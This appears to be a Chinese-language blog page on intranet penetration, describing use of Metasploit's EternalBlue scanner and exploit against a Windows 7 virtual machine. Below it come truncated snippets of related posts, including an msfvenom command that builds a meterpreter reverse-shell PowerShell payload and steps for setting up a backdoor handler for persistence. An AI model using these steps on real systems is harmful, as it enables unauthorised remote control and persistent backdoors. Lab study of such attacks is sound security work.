準備工具:一台kall虛擬機器(擁有msf)
一台win7虛擬機器
先使用msf的永恆之藍掃瞄模組對區域網進行掃瞄,可以掃瞄出區域網內符合條件的計算機資訊。
這裡先推薦用nmap掃瞄區域網的存活機後,直接指定ip掃瞄把,用這個模板直接掃瞄整個區域網實在是太浪費時間了。
在掃瞄出有著永恆之藍漏洞的計算機後,我們已經得到對方的ip,直接使用msf的永恆之藍攻擊模板對其進行滲透。
現在我們就已經成功的入侵到了win7計算機當中了,通過永恆之藍漏洞,簡簡單單遠端就能控制區域網內的任何一台win7計算機。
內網滲透之msf工具詳解
一.檔案目錄 date目錄 儲存資料 documentation目錄 文件目錄 lib目錄 儲存ruby指令碼 modules目錄 儲存模組和外掛程式 tools目錄 儲存小工具 二.基礎使用 msfdb init 初始化並啟動資料庫 db status 檢視資料庫狀態 msfconsole 控制台...
msf反彈shell內網滲透
1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...
內網滲透 許可權維持 MSF
msf路徑 usr share 製作後門 msfvenom windows示例 遠控流程 2.開啟msf並進入handle模組 3.設定payload型別 必須與第一步一致 4.設定lhost和lport 與第一步生成的後門一致 5.options檢視配置是否正確 6.run執行 bg將程序放到後台...